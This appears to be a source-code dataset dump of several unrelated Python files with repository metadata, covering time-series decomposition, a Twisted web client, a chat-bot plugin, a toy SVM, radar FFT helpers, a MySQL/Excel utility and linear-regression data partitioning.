low_pass_deg=self.low_pass_deg,
robust=self.robust,
seasonal_jump=self.seasonal_jump,
trend_jump=self.trend_jump,
low_pass_jump=self.low_pass_jump,
).fit()
self.seasonal_ = pd.Series(self.stl_.seasonal, index=X.index)
self.resid_ = pd.Series(self.stl_.resid, index=X.index)
self.trend_ = pd.Series(self.stl_.trend, index=X.index)
return self
def _transform(self, X, y=None):
from statsmodels.tsa.seasonal import STL as _STL
# fit again if indices not seen, but don't store anything
if not X.index.equals(self._X.index):
X_full = X.combine_first(self._X)
new_stl = _STL(
X_full.values,
period=self.sp,
seasonal=self.seasonal,
trend=self.trend,
low_pass=self.low_pass,
seasonal_deg=self.seasonal_deg,
trend_deg=self.trend_deg,
low_pass_deg=self.low_pass_deg,
robust=self.robust,
seasonal_jump=self.seasonal_jump,
trend_jump=self.trend_jump,
low_pass_jump=self.low_pass_jump,
).fit()
ret_obj = self._make_return_object(X_full, new_stl)
else:
ret_obj = self._make_return_object(X, self.stl_)
return ret_obj
def _inverse_transform(self, X, y=None):
if not self._X.index.equals(X.index):
raise NotImplementedError(
"""
STLTransformer is only a descriptive trasnformer and
can only inverse_transform data that was given in fit().
Please use Deseasonalizer or Detrender."""
)
return y + self.seasonal_
# return y + self.seasonal_ + self.trend_
def _make_return_object(self, X, stl):
# deseasonalize only
transformed = pd.Series(X.values - stl.seasonal, index=X.index)
# transformed = pd.Series(X.values - stl.seasonal - stl.trend, index=X.index)
if self.return_components:
seasonal = pd.Series(stl.seasonal, index=X.index)
resid = pd.Series(stl.resid, index=X.index)
trend = pd.Series(stl.trend, index=X.index)
ret = pd.DataFrame(
{
"transformed": transformed,
"seasonal": seasonal,
"trend": trend,
"resid": resid,
}
)
else:
ret = transformed
return ret
@classmethod
def get_test_params(cls):
"""Return testing parameter settings for the estimator.
Returns
-------
params : dict or list of dict, default = {}
Parameters to create testing instances of the class
Each dict are parameters to construct an "interesting" test instance, i.e.,
`MyClass(**params)` or `MyClass(**params[i])` creates a valid test instance.
`create_test_instance` uses the first (or only) dictionary in `params`
"""
# test case 1: all default parmameters
params1 = {}
# test case 2: return all components
params2 = {"return_components": True}
# test case 3: seasonality parameter set, from the skipped doctest
params3 = {"sp": 12}
return [params1, params2, params3]
| [
"noreply@github.com"
] | sktime.noreply@github.com |
e509840b1f2036dd4d4fd2e934b4c8f66f9a6d4a | e7e800dc3de419e9636b3204da7c43a076bc4a89 | /webclient.py | 90d2471da9f6b20015c0b1e84170b4e116afad73 | [] | no_license | BasalGanglia/twistedfinger | 349c9626e60c92f1eb4a7e84ae819553ba21892d | 301ea29c1b980afe068e782f98e4011ff6ad9dba | refs/heads/master | 2020-03-19T13:57:17.070932 | 2018-06-12T08:51:45 | 2018-06-12T08:51:45 | 136,602,765 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 532 | py | from __future__ import print_function
from twisted.internet import reactor
from twisted.web.client import Agent
from twisted.web.http_headers import Headers
agent = Agent(reactor)
d = agent.request(
b'GET',
b'http://localhost/ilkka/test/:8000',
#b'GET',
#b'http://google.com',
Headers({'User-Agent': ['Twisted Web Client Example']}),
None)
def cbResponse(ignored):
print('Response received')
d.addCallback(cbResponse)
def cbShutdown(ignored):
reactor.stop()
d.addBoth(cbShutdown)
reactor.run() | [
"ilkka.kosunen@gmail.com"
] | ilkka.kosunen@gmail.com |
a5f0b3191bcadf185372843a5c817ae11372a54b | 146db0a1ba53d15ab1a5c3dce5349907a49217c3 | /omega_miya/plugins/nbnhhsh/__init__.py | 7866c153d40576e1b4b45923a629b974818a5e08 | [
"Python-2.0",
"MIT"
] | permissive | hailong-z/nonebot2_miya | 84d233122b2d785bfc230c4bfb29326844700deb | 7d52ef52a0a13c5ac6519199e9146a6e3c80bdce | refs/heads/main | 2023-03-26T14:59:31.107103 | 2021-03-09T17:01:08 | 2021-03-09T17:01:08 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,827 | py | import re
from nonebot import on_command, export, logger
from nonebot.typing import T_State
from nonebot.adapters.cqhttp.bot import Bot
from nonebot.adapters.cqhttp.event import GroupMessageEvent
from nonebot.adapters.cqhttp.permission import GROUP
from omega_miya.utils.Omega_plugin_utils import init_export
from omega_miya.utils.Omega_plugin_utils import has_command_permission, permission_level
from .utils import get_guess
# Custom plugin usage text
__plugin_name__ = '好好说话'
__plugin_usage__ = r'''【能不能好好说话?】
拼音首字母缩写释义
**Permission**
Command & Lv.30
**Usage**
/好好说话 [缩写]'''
# Init plugin export
init_export(export(), __plugin_name__, __plugin_usage__)
# 注册事件响应器
nbnhhsh = on_command('好好说话', rule=has_command_permission() & permission_level(level=30), aliases={'hhsh', 'nbnhhsh'},
permission=GROUP, priority=20, block=True)
# 修改默认参数处理
@nbnhhsh.args_parser
async def parse(bot: Bot, event: GroupMessageEvent, state: T_State):
args = str(event.get_plaintext()).strip().lower().split()
if not args:
await nbnhhsh.reject('你似乎没有发送有效的参数呢QAQ, 请重新发送:')
state[state["_current_key"]] = args[0]
if state[state["_current_key"]] == '取消':
await nbnhhsh.finish('操作已取消')
@nbnhhsh.handle()
async def handle_first_receive(bot: Bot, event: GroupMessageEvent, state: T_State):
args = str(event.get_plaintext()).strip().lower().split()
if not args:
pass
elif args and len(args) == 1:
state['guess'] = args[0]
else:
await nbnhhsh.finish('参数错误QAQ')
@nbnhhsh.got('guess', prompt='有啥缩写搞不懂?')
async def handle_nbnhhsh(bot: Bot, event: GroupMessageEvent, state: T_State):
guess = state['guess']
if re.match(r'^[a-zA-Z0-9]+$', guess):
res = await get_guess(guess=guess)
if res.success() and res.result:
try:
data = dict(res.result[0])
except Exception as e:
logger.error(f'nbnhhsh error: {repr(e)}')
await nbnhhsh.finish('发生了意外的错误QAQ, 请稍后再试')
return
if data.get('trans'):
trans = str.join('\n', data.get('trans'))
msg = f"为你找到了{guess}的以下解释:\n\n{trans}"
await nbnhhsh.finish(msg)
elif data.get('inputting'):
trans = str.join('\n', data.get('inputting'))
msg = f"为你找到了{guess}的以下解释:\n\n{trans}"
await nbnhhsh.finish(msg)
await nbnhhsh.finish(f'没有找到{guess}的相关解释QAQ')
else:
await nbnhhsh.finish('缩写仅支持字母加数字, 请重新输入')
| [
"ailitonia@gmail.com"
] | ailitonia@gmail.com |
29d68c117848a99093caea9576f255c3fd233bb3 | c7fc1265dd09cae456c978c09643811bf3aa89d7 | /mileage_cal.py | 722bfc599c73d4858c72caed5ac2bbc36aa3fabd | [] | no_license | chandraprakashh/Data_Handling | e136c6bc188506ca6660becd434d5a17bed8e199 | 59f43288dea379f8fe0bb0fe01b17d0e5e99e057 | refs/heads/master | 2020-07-18T18:11:25.908312 | 2020-01-13T10:24:51 | 2020-01-13T10:24:51 | 206,290,142 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 566 | py | # -*- coding: utf-8 -*-
"""
Spyder Editor
This is a temporary script file.
"""
"""
1.Code Challenge
Name:
Gas Mileage Calculator
Filename:
mileage_cal.py
Problem Statement:
Assume my car travels 100 Kilometres after putting 5 litres of fuel.
Calculate the average of my car.
Hint:
Divide kilmeters by the litres used to get the average
"""
#car travels 100 Kilometres
distance = 100
#putting 5 litres of fuel
fuel= 5
#average
average= distance/fuel
print("avreage my car ={}".format(average))
| [
"noreply@github.com"
] | chandraprakashh.noreply@github.com |
3b9c2b97c211502ed2c84f7a565b788565349690 | 9071b1dad5e1aee8d0246b07db767368a48a4542 | /PCC Chapter 5/5-4.py | 59c6a1dba791630ca2cceb3b4bc55429a3b477d2 | [] | no_license | usmansabir98/AI-Semester-101 | 01b4b2ae924f2fe9d6edf8ad260a741f1b0ba42c | 8b7e78ffd610b0712c5a3249a7fa1fbb99e0a24c | refs/heads/master | 2021-09-07T04:47:08.410275 | 2018-02-17T17:39:14 | 2018-02-17T17:39:14 | 115,215,481 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 662 | py | # 5-4. Alien Colors #2: Choose a color for an alien as you did in Exercise 5-3, and
# write an if-else chain.
# • If the alien’s color is green, print a statement that the player just earned
# 5 points for shooting the alien.
# • If the alien’s color isn’t green, print a statement that the player just earned
# 10 points.
# • Write one version of this program that runs the if block and another that
# runs the else block.
def test_color(color):
if color=='green':
print("You earned 5 points")
else:
print("You earned 10 points")
alien_color= 'green'
test_color(alien_color)
alien_color = 'yellow'
test_color(alien_color)
| [
"usmansabir98@hotmail.com"
] | usmansabir98@hotmail.com |
ea4a74d9db2d97d5f67d3b44f4e0dfad9d27cf2c | 5aa27ee23ca28e66a8590d44ec8287db26e59e99 | /venv/bin/stream_naver | a5a4ca992b0fa481c184d4a097779a8412c582ac | [] | no_license | denhur62/TFIDF_mecab | fe56191819ca1347fa5f91ceefc7447dd8e19a4c | e9eb17ac7de70798ee5621af24866c04604ca4b2 | refs/heads/main | 2023-07-01T11:34:06.492438 | 2021-08-08T07:31:28 | 2021-08-08T07:31:28 | 393,447,722 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 263 | #!/Users/denhur62/Documents/GitHub/TFIDF-mecab/venv/bin/python3
# -*- coding: utf-8 -*-
import re
import sys
from konlpy.stream.naver import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw|\.exe)?$', '', sys.argv[0])
sys.exit(main())
| [
"denhur62@naver.com"
] | denhur62@naver.com | |
8d4d1e3177e0d876bf1acd5a951eac101297b9f6 | 16c092aab67f1ff6a92adf48ce8b8054ce51d7ba | /simulator/processing/range_processing.py | 438a1feaa29e856c5049487f2ccdd7823c0505f0 | [] | no_license | yukkkkun/Radarsimulation | 3d40c8671a38b340178da76689336b974084aab9 | 23052c7869c113c962b600496b6392e3afa1b167 | refs/heads/master | 2022-12-19T04:19:29.745745 | 2020-10-04T09:52:51 | 2020-10-04T09:52:51 | 287,907,507 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,208 | py | import numpy as np
def range_resolution(num_adc_samples, dig_out_sample_rate=2500, freq_slope_const=60.012):
""" Calculate the range resolution for the given radar configuration
Args:
num_adc_samples (int): The number of given ADC samples in a chirp
dig_out_sample_rate (int): The ADC sample rate
freq_slope_const (float): The slope of the freq increase in each chirp
Returns:
tuple [float, float]:
range_resolution (float): The range resolution for this bin
band_width (float): The bandwidth of the radar chirp config
"""
light_speed_meter_per_sec = 299792458
freq_slope_m_hz_per_usec = freq_slope_const
adc_sample_period_usec = 1000.0 / dig_out_sample_rate * num_adc_samples
band_width = freq_slope_m_hz_per_usec * adc_sample_period_usec * 1e6
range_resolution = light_speed_meter_per_sec / (2.0 * band_width)
return range_resolution, band_width
def range_processing(adc_data, window_type_1d=None, axis=-1):
"""Perform 1D FFT on complex-format ADC data.
Perform optional windowing and 1D FFT on the ADC data.
Args:
adc_data (ndarray): (num_chirps_per_frame, num_rx_antennas, num_adc_samples). Performed on each frame. adc_data
is in complex by default. Complex is float32/float32 by default.
window_type_1d (mmwave.dsp.utils.Window): Optional window type on 1D FFT input. Default is None. Can be selected
from Bartlett, Blackman, Hanning and Hamming.
Returns:
radar_cube (ndarray): (num_chirps_per_frame, num_rx_antennas, num_range_bins). Also called fft_1d_out
"""
# windowing numA x numB suggests the coefficients is numA-bits while the
# input and output are numB-bits. Same rule applies to the FFT.
fft1d_window_type = window_type_1d
if fft1d_window_type:
fft1d_in = utils.windowing(adc_data, fft1d_window_type, axis=axis)
else:
fft1d_in = adc_data
# Note: np.fft.fft is a 1D operation, using higher dimension input defaults to slicing last axis for transformation
radar_cube = np.fft.fft(fft1d_in, axis=axis)
return radar_cube | [
"yutaka.higashis3@gmail.com"
] | yutaka.higashis3@gmail.com |
91d2c06e9e6783e4b3605f0da5fa10130d04e780 | b9c6ee69df8b1cf73ac468afe5b32eb2ececefb6 | /suitaby/data/__init__.py | 7fe2c41a665e74a4536aac47b387a58c3bf5258c | [] | no_license | velix/suitaby_python_tools | 7d068417b8a66a0477cb21a9a7b79e8f144a695b | 2aabc88f7f2880cbd029118ee53f76c6164ac82b | refs/heads/master | 2021-01-21T08:05:32.495106 | 2015-10-10T18:24:59 | 2015-10-10T18:24:59 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 240 | py | #from IO import IO
#from FormatChecker import FormatChecker
#from Sizes import Sizes
#from Generator import Generator
#from DBHelper import DBHelper
#from Tester import Tester
#from People import People
#from SizeCatalog import SizeCatalog
| [
"panosracing@hotmail.com"
] | panosracing@hotmail.com |
4abd4f456948302874dfdc97f41babf31670d96a | 4786fe9537fbcb50b7490f7f95624e9c8589801f | /ex21a.py | b80932994d975a1f5b8f8cfd3bbc785b73fc603b | [] | no_license | dbialon/LPTHW | 075e5a82c541dd277ee30f5ebbc221e30c63e29e | 3e6674cded2bcd90d4a098efd00a71abeb33bdc5 | refs/heads/master | 2022-06-07T02:14:18.180807 | 2020-05-02T13:30:52 | 2020-05-02T13:30:52 | 259,911,016 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 723 | py | def add(a, b):
print(f"ADDING {a} + {b}")
return a + b
def subtract(a, b):
print(f"SUBTRACTING {a} - {b}")
return a - b
def multiply(a, b):
print(f"MULTIPLYING {a} * {b}")
return a * b
def divide(a, b):
print(f"DIVIDING {a} / {b}")
return a / b
print("""
This programm will execute the following calculation:
(A - B) / C * D + E
""")
varA = float(input("What is your A? --- "))
varB = float(input("What is your B? --- "))
varC = float(input("What is your C? --- "))
varD = float(input("What is your D? --- "))
varE = float(input("What is your E? --- "))
print()
result = add(multiply(divide(subtract(varA, varB), varC), varD), varE)
print("\nThat becomes:", result) | [
"dbialon79@outlook.com"
] | dbialon79@outlook.com |
853783386fe7499ba2d42b810f0108c2fa98a501 | 5d02f39266d59d46a3b3b3526cdcbfa2b4089a8c | /db_excel/excel.py | 459b0f37c3dc01581f0aa1e72665eae7b9532128 | [] | no_license | gesang08/OperateMysqlAndExcel | dd4cbc2955cbbb982ed903ec7ccb5c2c12011e60 | 34502546d5fcb0058e5bf22178d4ed5290b021ab | refs/heads/master | 2020-05-27T21:31:09.518216 | 2019-10-12T11:56:42 | 2019-10-12T11:56:42 | 188,792,357 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 11,363 | py | #!/usr/bin/env python
# _*_ coding: UTF-8 _*_
"""
实现操作数据库的类,可将从数据库获得的以字段为键,以字段内容为值的存储格式数据;
实现对excel表的创建,读取,写入,追加的类
"""
import MySQLdb
import MySQLdb.cursors
import os
import xlwt
import xlrd
import xlutils.copy # xlutils 读入一个excel文件,然后进行修改或追加,不能操作xlsx,只能操作xls
SERVER_IP = '127.0.0.1'
USER = 'root'
PASSWORD = '12345678'
DB = 'gs_package'
PORT = 3306
CHARSET = 'utf8'
def main():
sql = "SELECT `Contract_id`, `Order_id`, `Sec_id`, `Part_id`, `Door_type`, `Door_height`, `Door_width`, `Door_thick`, `Package_state`, `Element_type_id` FROM `order_part_online` WHERE 1"
db = database()
ex = operate_excel(excel_file_name='data.xls')
q = db.get_more_row(sql)
# ex.write_excel(q)
print ex.read_excel()
# ex.append_excel()
# for i in range(len(q)):
# print q
class database(object):
"""
封装数据库操作类
"""
# 注,python的self等于其它语言的this
def __init__(self, log=None, dbhost=None, dbname=None, user=None, password=None, port=None, charset=None):
self._logger = log
# 这里的None相当于其它语言的NULL
self._dbhost = SERVER_IP if dbhost is None else dbhost
self._dbname = DB if dbname is None else dbname
self._user = USER if user is None else user
self._password = PASSWORD if password is None else password
self._port = PORT if port is None else port
self._charset = CHARSET if charset is None else charset
self.conn = None
self.get_conn_result = self.is_connection_db()
if self.get_conn_result: # 只有数据库连接上才获取数据游标
self._cursor = self.conn.cursor()
def is_connection_db(self, get_data_method='dict'):
"""
数据库连接方法,默认获取的数据类型为字典,它以字段为key,以字段下的数据为value
:param get_data_method:
:return:
"""
try:
if get_data_method == 'dict':
# 1.获取一行数据,返回的是dict类型,它以数据表中的字段为key,以字段下的数据为value
# 2.获取多行数据,返回的是tuple类型,tuple序列内容为dict类型,它以数据表中的字段为key,以字段下的数据为value
self.conn = MySQLdb.connect(host=self._dbhost,
user=self._user,
passwd=self._password,
db=self._dbname,
port=self._port,
cursorclass=MySQLdb.cursors.DictCursor,
charset=self._charset,
)
elif get_data_method == 'tuple':
self.conn = MySQLdb.connect(host=self._dbhost,
user=self._user,
passwd=self._password,
db=self._dbname,
port=self._port,
charset=self._charset,
)
else:
self._logger.warn("please give correct method for getting data!")
return False
except Exception, e:
self._logger.warn("query database exception,%s" % e)
return False
else:
return True
def get_more_row(self, sql):
"""
从数据库中获取多行数据方法
:param sql:
:return:
"""
record = ""
if self.get_conn_result:
try:
self._cursor.execute(sql)
record = self._cursor.fetchall() # 获取多行数据函数
if record == () or record is None:
record = False
self._cursor.close() # 关闭游标
self.conn.close() # 关闭数据库
except Exception, e:
record = False
self._logger.warn("query database exception,sql= %s,%s" % (sql, e))
return record
def get_one_row(self, sql):
"""
从数据库中获取一行数据方法
:param sql:
:return:
"""
record = ""
if self.get_conn_result:
try:
self._cursor.execute(sql)
record = self._cursor.fetchone() # 获取多行数据函数
if record == () or record is None:
record = False
self._cursor.close() # 关闭游标
self.conn.close() # 关闭数据库
except Exception, e:
record = False
self._logger.warn("query database exception,sql= %s,%s" % (sql, e))
return record
def modify_sql(self, sql):
"""
更新、插入、删除数据库数据方法
:param sql:
:return:
"""
flag = False
if self.get_conn_result:
try:
self._cursor.execute(sql)
self.conn.commit()
flag = True
except Exception, e:
flag = False
self._logger.warn("query database exception,sql= %s,%s" % (sql, e))
return flag
'''
常用’/‘来表示相对路径,’\‘来表示绝对路径,还有路径里\\是转义的意思(python3也可以写成open(r'D:\user\ccc.txt'),r表示转义)
'''
class operate_excel(object):
"""
创建excel表,并操作excel表的读写,保存表
"""
def __init__(self, log=None, excel_file_name=None, sheet_name="sqldata"):
self._logger = log
self.excel_file_name = excel_file_name
self.sheet_name = sheet_name
def create_excel(self):
all_files = os.listdir(os.getcwd()) # 获取当前工程项目文件夹下所有文件名
if self.excel_file_name not in all_files:
excel_file = open(self.excel_file_name, 'w+')
excel_file.close()
self.excel_file_name = excel_file.name
def write_excel(self, data):
"""
将数据库数据写到excel中
:param data:
:return:
"""
i = 0
key = []
value = []
key_2D = []
value_2D = []
workbook = xlwt.Workbook(encoding='utf-8') # 实例化新建工作薄excel的类
"""
xlwt.Workbook类的构造函数__init__(self,encoding ='ascii',style_compression = 0)
1.encoding表示文件(.xls or .xlsx)编码格式,一般要这样设置:w = Workbook(encoding='utf-8'),就可以在excel中输出中文了;
2.style_compression表示是否压缩 ,一般情况下使用默认参数即可
"""
sheet = workbook.add_sheet(sheetname=self.sheet_name, cell_overwrite_ok=True) # 新建一个名为self.sheet_name的表
"""
Workbook类下面的add_sheet(self, sheetname, cell_overwrite_ok=False)方法:
1.sheetname新增表的名称;
2.cell_overwrite_ok,表示是否可以覆盖单元格,其实是Worksheet实例化的一个参数,默认值是False,表示不可以覆盖单元格
"""
if data:
if isinstance(data, dict): # 只有一行数据
for k, v in data.items():
key.append(k)
value.append(v)
for k in range(len(key)):
sheet.write(i, k, key[k])
"""
xlwt.Worksheet类下面的write(self, r, c, label="", style=Style.default_style)方法:
1.r:行的数字编号index,从0开始
2.c:列的数字编号index,从0开始
3.label:要写入的数据值
4.style:样式(也称为XF(扩展格式))是一个 XFStyle对象,它封装应用于单元格及其内容的格式。
XFStyle最好使用该easyxf()功能设置对象 。它们也可以通过在设置属性设置Alignment,Borders, Pattern,
Font和Protection对象然后设置这些对象和一个格式字符串作为属性 XFStyle对象。
"""
i += 1
for k in range(len(value)):
sheet.write(i, k, value[k])
if isinstance(data, tuple): # 有多行数据
for data_row in data:
for k, v in data_row.items():
key.append(k)
value.append(v)
key_2D.append(key)
value_2D.append(value)
key = []
value = []
for k in range(len(key_2D[0])):
sheet.write(i, k, key_2D[0][k])
i += 1
for row in range(len(value_2D)):
for col in range(len(value_2D[row])):
sheet.write(row + 1, col, value_2D[row][col])
workbook.save('./%s' % self.excel_file_name)
"""
Workbook类下面的save(self, filename_or_stream)方法:
filename_or_stream:1.这可以是包含文件文件名的字符串,在这种情况下,使用提供的名称将excel文件保存到磁盘。
2.它也可以是具有write方法的流对象,例如a StringIO,在这种情况下,excel文件的数据被写入流。
若./的相对路径下没有self.excel_file_name文件,则创建self.excel_file_name的文件进行保存
"""
def read_excel(self):
content = []
data = xlrd.open_workbook('./%s' % self.excel_file_name)
table = data.sheets()[0] # 通过索引顺序获取表
# table = data.sheet_by_index(0) # 通过索引顺序获取表
# table = data.sheet_by_name(self.sheet_name) # 通过名称获取表
"""
通过行table.nrows(获取行数)和table.row_values(i)(获取整行数据,以list形式返回)获得excel数据
"""
for i in range(table.nrows):
content.append(table.row_values(i))
"""
通过列table.ncols(获取列数)和table.col_values(i)(获取整列数据,以list形式返回)获得excel数据
"""
# for i in range(table.ncols):
# content.append(table.col_values(i))
"""
通过table.cell_value(i, j)(获取单元格数据)获得excel数据
"""
# for i in range(table.nrows):
# for j in range(table.ncols):
# content.append(table.cell_value(i, j))
# B1 = table.row(0)[1].value # 通过行列索引来获取单元格数据
return content
def append_excel(self):
data = xlrd.open_workbook('./%s' % self.excel_file_name)
buffer_data = xlutils.copy.copy(data)
table = buffer_data.get_sheet(0)
table.write(90, 0, 'append_test')
buffer_data.save('./%s' % self.excel_file_name)
if __name__ == '__main__':
main() | [
"2199377508@qq.com"
] | 2199377508@qq.com |
0b1675281d2198123e759669b70a4f5c751a2d7f | 6cb5aee6af8351a5ca4b095a3e37eab2054c83bc | /Semana 5/ex5.py | 560e7b74a8ba83e5f40433846b6fb145fea86532 | [] | no_license | RafaelCsantos/AlgBionfo | 2e035f2f96f2c77780cde475d7bd8ce25d52056c | fd4b09d8edb409ae319864835904ed4ce94c2eba | refs/heads/main | 2023-04-23T19:42:48.372094 | 2021-04-29T03:15:49 | 2021-04-29T03:15:49 | 362,674,959 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,034 | py | dados={}
pessoas=[]
peso=0
imc=0
altura=0
imctotal=0
cont=0
alttotal=0
pesototal=0
while True:
pessoas.clear()
dados['nome']= str(input('Nome:'))
while True:
dados['sexo']= str(input('Digite o Sexo M OU F:')).upper()
if dados['sexo'] in 'MF':
break
print("Digite apenas M OU F")
dados['peso']= float(input('Peso:'))
peso=peso+dados['peso']
pesototal=pesototal+peso
dados['altura']= float(input('altura:'))
altura=altura+dados['altura']
alttotal=altura+alttotal
cont=cont+1
imc=round (peso/(altura**2),2)
imctotal=round((imctotal+imc),2)
imc=0
altura=0
peso=0
pessoas.append(dados.copy())
resp=str(input("Deseja continuar? N-não / Outra tecla - sim")).upper()
if resp==("N"):
break
print("A quantidade de pessoas cadastradas foi de",cont)
print("O peso médio das pessoas é de",pesototal/cont)
print("A altura media das pessoas é de",alttotal/cont)
print("O IMC médio das pessoas foi de",imctotal/cont)
| [
"rafaelcssantos@hotmail.com"
] | rafaelcssantos@hotmail.com |
d279ed36d0bb5f3e739bcd41a7e7926ea816e47d | 9fa9ceac0db98e4a73c9bd7b7c93506fcd9d2261 | /my_SVM.py | f3ec16da1dbca8ad95314a144fe1869a4f0d6b89 | [] | no_license | cuihan1994/ML | 8363c69ac40d932381942b30953007a492294ead | 413b784a93a2ba698e762ad6a0481de1835f1f6b | refs/heads/master | 2020-04-12T15:26:25.046328 | 2018-12-20T13:09:00 | 2018-12-20T13:09:00 | 162,581,031 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,040 | py | import matplotlib.pyplot as plt
from matplotlib import style
import numpy as np
style.use('ggplot')
class Support_Vector_Machine:
def __init__(self,visualiazation = True):
self.visualization = visualiazation
self.colors = {1:'r',-1:'b'}
if self.visualization:
self.fig = plt.figure()
self.ax = self.fig.add_subplot(1,1,1)
def fit(self,data):
self.data = data
#{ ||w||:[w,b]}
opt_dict = {}
transforms = [[1,1],
[-1,1],
[-1,-1],
[1,-1]]
all_data = []
for yi in self.data:
for featureset in self.data[yi]:
for features in featureset:
all_data.append(features)
self.max_feature_value = max(all_data)
self.min_feature_value = min(all_data)
#print(all_data)
all_data = None
step_size = [self.max_feature_value * 0.1,
self.max_feature_value * 0.01,
self.max_feature_value * 0.001]
b_range_multiple = 5
b_multiple = 5
latest_optimum = self.max_feature_value*10
for step in step_size:
w = np.array([latest_optimum,latest_optimum])
optimized = False
while not optimized:
for b in np.arange(-1*(self.max_feature_value*b_range_multiple),
self.max_feature_value*b_range_multiple,
step*b_multiple):
for transformation in transforms:
w_t = w * transformation
found_option = True
for i in self.data:
for xi in self.data[i]:
yi=i
if not yi*(np.dot(w_t, xi) + b) >= 1:
found_option = False
if found_option:
opt_dict[np.linalg.norm(w_t)] = [w_t,b]
#print(opt_dict)
if w[0] < 0 :
optimized = True
print ('Optimized a step')
else:
w= w - step
#print(w)
norms = sorted([n for n in opt_dict])
print(norms)
opt_choice = opt_dict[norms[0]]
print(opt_choice)
self.w = opt_choice[0]
self.b = opt_choice[1]
latest_optimum = opt_choice[0][0]+step*2
def predict(self,features):
classification = np.sign(np.dot(np.array(features),self.w)+self.b)
if classification != 0 and self.visualization:
self.ax.scatter(features[0],features[1],s= 200,marker = '*', c = self.colors[classification])
return classification
def visualize(self):
[[self.ax.scatter(x[0],x[1],s=100,color = self.colors[i]) for x in data_dict[i]] for i in data_dict]
def hyperplane(x,w,b,v):
return (-w[0]*x-b+v)/w[1]
datarange = (self.min_feature_value*0.9,self.max_feature_value*1.1)
hyp_x_min = datarange[0]
hyp_x_max = datarange[1]
psv_1 = hyperplane(hyp_x_min,self.w,self.b,1)
psv_2 = hyperplane(hyp_x_max,self.w,self.b,1)
self.ax.plot([hyp_x_min,hyp_x_max],[psv_1,psv_2])
nsv_1 = hyperplane(hyp_x_min, self.w, self.b, -1)
nsv_2 = hyperplane(hyp_x_max, self.w, self.b, -1)
self.ax.plot([hyp_x_min, hyp_x_max], [nsv_1, nsv_2])
db_1 = hyperplane(hyp_x_min, self.w, self.b, 0)
db_2 = hyperplane(hyp_x_max, self.w, self.b, 0)
self.ax.plot([hyp_x_min, hyp_x_max], [db_1, db_2])
plt.show()
data_dict = {-1:np.array([[1,7],
[2,8],
[3,8]]),
1:np.array([[5,1],
[6,-1],
[7,3]])}
svm = Support_Vector_Machine()
svm.fit(data = data_dict )
svm.visualize() | [
"1034084684@qq.com"
] | 1034084684@qq.com |
8f45532721df9ce375e512eac8e8b5d2f48bbfcc | fe2eef159f7e75b6a3b4ecbacab53a19df33b8eb | /setup.py | 3c3eff7248dd676186f2778a2b4149610c6dc6e0 | [
"MIT"
] | permissive | a1fred/django-model-render | 6b9572ff26ced93e6de0aa15ac97fef1217ebeba | 0912b2ec9d33bada8875a57f7af9eb18d24e1e84 | refs/heads/master | 2020-09-12T19:23:57.847976 | 2017-01-02T20:49:20 | 2017-01-02T20:49:20 | 32,887,644 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,077 | py | #!/usr/bin/python
# -*- coding: utf-8 -*-
from setuptools import setup
requirements = [
'django>=1.4',
]
setup(
name='django-model-render',
version='0.5',
description='Django models extension that allows define default model templates',
author='a1fred',
author_email='demalf@gmail.com',
license='MIT',
url='https://github.com/a1fred/django-model-render',
packages=['model_render'],
test_suite="runtests",
platforms=['any'],
zip_safe=False,
install_requires=requirements,
tests_require=requirements,
classifiers=[
'Development Status :: 5 - Production/Stable',
'Environment :: Django',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Operating System :: MacOS :: MacOS X',
'Operating System :: Unix',
'Operating System :: POSIX',
'Programming Language :: Python',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
],
)
| [
"demalf@gmail.com"
] | demalf@gmail.com |
b8258a084ce7c4e00f53da32dc4f0012424731e4 | 83447f1c06244a5d1f62a5147a0dc3855b0142f4 | /main.py | ca795d368bd1813e37774082aba5d37a94bdae7a | [] | no_license | bhedavivek/linearregression | eeffa5709fc6cceed4d9229a6c43d07adcf74980 | 04ad15c26ad4e1d910b6f2d330e37d5900795ef3 | refs/heads/master | 2021-01-09T05:23:34.168593 | 2016-11-19T08:05:20 | 2016-11-19T08:05:20 | 80,758,851 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,996 | py | #IMPORTS
import csv;
import numpy as np;
from numpy.linalg import inv;
from scipy.spatial import distance
import math;
import random;
import scipy.cluster.vq as vq;
class dataSet():
def __init__(self):
self.training={'x_matrix':[],'target_vector':[]}
self.validation={'x_matrix':[],'target_vector':[]}
self.testing={'x_matrix':[],'target_vector':[]}
#Partitioning Data Set into Training, Validation and Testing Sets
def partition(x_matrix,target_vector):
tem=dataSet()
tem.training['x_matrix']=[]
tem.training['target_vector']=[]
tem.validation['x_matrix']=[]
tem.validation['target_vector']=[]
tem.testing['x_matrix']=[]
tem.testing['target_vector']=[]
temp=[[],[],[]]
for i in range(0,len(x_matrix)):
t=x_matrix[i]
t.append(target_vector[i])
temp[int(target_vector[i])].append(t)
t_set=[[],[],[]]
for i in range(0,3):
m=len(temp[i])
for j in range(0,m):
if(j<0.7999*m):
t_set[0].append(temp[i][j])
elif(j<0.89989*m):
t_set[1].append(temp[i][j])
else:
t_set[2].append(temp[i][j])
for i in range(0,3):
random.shuffle(t_set[i])
m=len(t_set[i])
for j in range(0,m):
if i==0:
tem.training['target_vector'].append(t_set[i][j].pop())
tem.training['x_matrix'].append(t_set[i][j])
elif i==1:
tem.validation['target_vector'].append(t_set[i][j].pop())
tem.validation['x_matrix'].append(t_set[i][j])
elif i==2:
tem.testing['target_vector'].append(t_set[i][j].pop())
tem.testing['x_matrix'].append(t_set[i][j])
return tem
def getInverseVariance(x_matrix, mu_vector,n):
var_array=[]
for x in x_matrix[0]:
var_array.append(0)
